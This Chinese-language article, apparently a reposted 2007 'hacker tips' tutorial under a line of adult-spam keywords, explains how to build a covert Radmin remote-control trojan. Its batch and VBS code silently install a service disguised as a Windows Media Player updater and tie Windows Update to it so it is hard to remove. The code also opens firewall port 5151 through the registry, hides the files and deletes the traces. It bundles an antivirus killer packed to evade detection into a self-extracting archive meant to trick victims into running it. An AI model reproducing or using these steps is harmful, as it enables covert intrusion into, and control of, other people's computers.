亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

掃一掃
關注微信公眾號

黑客技巧 打造完美遠程控制軟件Radmin
2007-01-29   賽迪網

大家好,關于如何打造出完美的Radmin服務端,網上有很多類似的修改后的程序,但有的服務名會暴露,有的會顯示CMD窗口,我彌補了它們的缺點,綜合了它們的優點,打造出了現在這個完美的Radmin服務端。

準備工具

Rock免殺工具;

IcoSprite圖標更改器;

Killer15殺殺毒軟件防火墻工具;

SC.exe服務添加刪除更改工具;

AdmDll.dll、Raddrv.dll、R_server(這個不用說了吧,Radmin的服務端)。

程序特點

自解壓形式,雙擊即可,自動解壓到%systemroot%\system32\drivers\目錄下,并能干掉卡巴斯基等殺毒軟件。使用vbs嵌套bat來執行所有內容,不會跳出任何窗口。自建服務,并修改服務名、顯示名、描述使其做到隱蔽。依存Windows Update服務,給試圖關閉它帶來困惑。做完一切后以只讀,隱藏形式隱蔽Radmin服務端的三個程序,刪除掉生成的一些REG、BAT、VBS文件,并能夠突破Radmin外部連接進來時XP SP2防火墻的攔截。

制作過程

首先自己安裝一下Radmin服務端,配置完密碼,端口等信息后導出其在HKEY_LOCAL_MACHINE\SYSTEM\RAdmin的注冊表文件,這里我另存為名Server.reg。然后要修改R_server.exe的圖標并修改文件名為迷惑性文字如Update.exe,修改圖標我用IcoSprite,覺得還不錯。這樣假如對方裝有天網之類防火墻的話,可以騙過一些菜鳥,同意允許對外連接。

接下來我們制作核心部分,最關鍵的BAT,重要的我將簡單解釋:

@echo off 
@sc stop r_server 
‘假如已經被裝過R_server服務,先用SC將它停掉。 
@sc delete r_server 
‘將已經裝過R_server服務刪除。 
@regedit /s server.reg 
@SC create MPservice BinPath= "%systemroot%\system32\drivers\Update.exe /service" type= 
own type= interact start= auto DisplayName= "Media Player of Remote Control Driver 
Update" 
‘這句是用SC建立一個服務,服務名為Mpservice,路徑Binpath為"%systemroot%\system32
\drivers\Update.exe /service",類型type為 own 與interact交互,啟動類型start為自動,
顯示名DisplayName為"Media Player of Remote Control Driver Update"。 
@sc description MPservice "為Windows Media Player提供加載進程及驅動程序、
庫提供基層更新安全補丁的服務。" 
‘這句是將MPservice服務的描述改為“為Windows Media Player提供加載進程及驅動程序、
庫提供基層更新安全補丁的服務。” 
@sc config wuauserv depend= MPservice 
‘配置MPservice使wuauserv服務依存此服務(wuauserv可以根據自己喜歡改成其它服務,這里的
wuauserv是系統在Windows Update 
網站的自動更新服務)。這里的目的是迷惑管理員,使其不敢輕易停止我們生成的Radmin服務。 
@echo Windows Registry Editor Version 5.00 > %systemroot%\system32
\drivers\DisFirewall.reg 
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ParametersFirewallPolicyStandardProfile\GloballyOpenPorts\List] >> %systemroot%\system32\drivers\DisFirewall.reg 
‘這里添加成的一個DisFirewall.reg注冊表文件,在對方是XP SP2系統的情況下
將起到很大重要,由于SP2自帶的防火墻配置信息是存
放于注冊表中的,所有完全可以通過寫入自己想要的信息使你的R_server可以接受
外界的連接。 
@echo "5151:TCP"="5151:TCP:*:Enabled:Windows Update Services">> stemroot%\system32
\drivers\DisFirewall.reg 
‘這句是允許外部連接5151的TCP端口,設置防火墻此規則名為Windows Update Services。 
@regedit /s %systemroot%\system32\drivers\DisFirewall.reg 
@attrib +h +r %systemroot%\system32\drivers\Update.exe 
@attrib +h +r %systemroot%\system32\drivers\admdll.dll 
@attrib +h +r %systemroot%\system32\drivers\raddrv.dll 
‘以上三句是設置服務端三個文件為隱藏、只讀屬性。 
@sc start MPservice 
@del /q /f /s %systemroot%\system32\drivers\server.reg 
@del /q /f /s %systemroot%\system32\drivers\Update.vbs 
@del /q /f /s %systemroot%\system32\drivers\Update.bat 
@del /q /f /s %systemroot%\system32\drivers\sc.exe 
@del /q /f /s %systemroot%\system32\drivers\DisFirewall.reg 
‘以上是清理生成出來的雜物,加參數/q是以安靜模式刪除,不要求確認,
參數/f是強制刪除只讀文件,參數/s是從所有子目錄刪除指定文件。

接下來制作一個vbs文件,作用是令bat里的內容以安靜模式執行,這樣就可以讓cmd窗口跳出來了,增加了不少隱蔽性。里面寫上如下代碼:

On Error Resume Next 
set wshshell=createobject ("wscript.shell") 
a=wshshell.run ("Update.bat",0)

最后出場的是Killer15.exe這個東東,按它的說明書說是可以殺Norton AntiVirus、McAfee、個人計算機Cillin&KAV等。我用我的卡巴2006測試過,確實能被它殺掉。由于直接運行的話還沒執行就被殺毒軟件給干掉了,所以給它加個殼,這里用Rock免殺工具,經過它加的殼后逃過了我卡巴的大關,格式是:

usage: rock [filename]

好了,整理一下:三個服務端文件+一個注冊表信息,一個BAT,一個VBS,一個SC,一個Killer15,一共是8個文件,將它們打包制成自解壓形式。勾選RAR里的“創建自解壓格式壓縮文件”,到高級里打開“自解壓選項”,“解壓路徑”為%systemroot%\system32\drivers\,解壓后運行“Update.vbs”,解壓前運行“Killer15.new.exe”,模式里選“全部隱藏”跟“跳過已經存在文件”,文本和圖標選項里“從文件加載自解壓文件圖標”里選一個迷惑性的ico圖標做為自解壓最后生成的圖標。OK,一個自解壓形式的Radmin服務端就這樣生成了。假如你是*欺騙別人雙擊執行的,你還可以自己添加個小游戲之類的進去,令它雙擊自解壓的同時不會什么反映都沒有,這里我就不再闡述了。

熱詞搜索:

上一篇:另類高招 Windows系統中從源頭防病毒
下一篇:提供幾個有用的Javascript驗證腳本

分享到: 收藏